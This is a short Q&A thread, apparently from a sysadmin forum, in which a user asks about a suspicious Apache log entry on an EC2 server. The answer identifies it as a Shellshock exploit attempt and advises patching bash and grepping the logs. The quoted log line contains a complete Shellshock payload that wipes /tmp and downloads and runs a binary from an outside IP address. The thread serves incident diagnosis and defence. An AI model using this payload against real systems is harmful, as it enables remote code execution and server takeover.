Hack attempt on Amazon EC2 (Using wget to upload file to server)

Question

I was looking through my logs and I noticed a very weird line.

[Fri Jun 26 21:21:36.420706 2015] [:error] [pid 21172] [client 58.213.123.107:56538] Target WSGI script not found or unable to stat: /opt/python/current/app/application.py, referer: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://202.103.243.104:911/sudp -O /tmp/China.Z-foxr >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-foxr >> /tmp/Run.sh;echo /tmp/China.Z-foxr >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"

Looks like someone was abl to upload a file, change it to 777, run it and remove it all from the /tmp/ folder.

I'm very confused since it requires a auth file from Amazon to be able to connect to the ec2 instance by SSH and I doubt that they got access to this file.

Is there any other way they could have got access? Could there be some permissions settings that are wrong on my instance?

Answer 1

This is an attempt to exploit the shellshock vulnerability. Judging by the error code it would seem it failed to execute, however I suspect you may find other instances in your logs.

The first step is to determine if you have a vulnerable bash version on your server. If the bash version is patched there is no chance of these attempts being successful. However if you are running a vulnerable version you should patch it immediately and then start looking through your logs for shellshock entries. Using grep to look for '()' or '; }' '; }' is a good place to start. It is worth noting that several shellshock exploits do not leave any traces of the payload in the logs.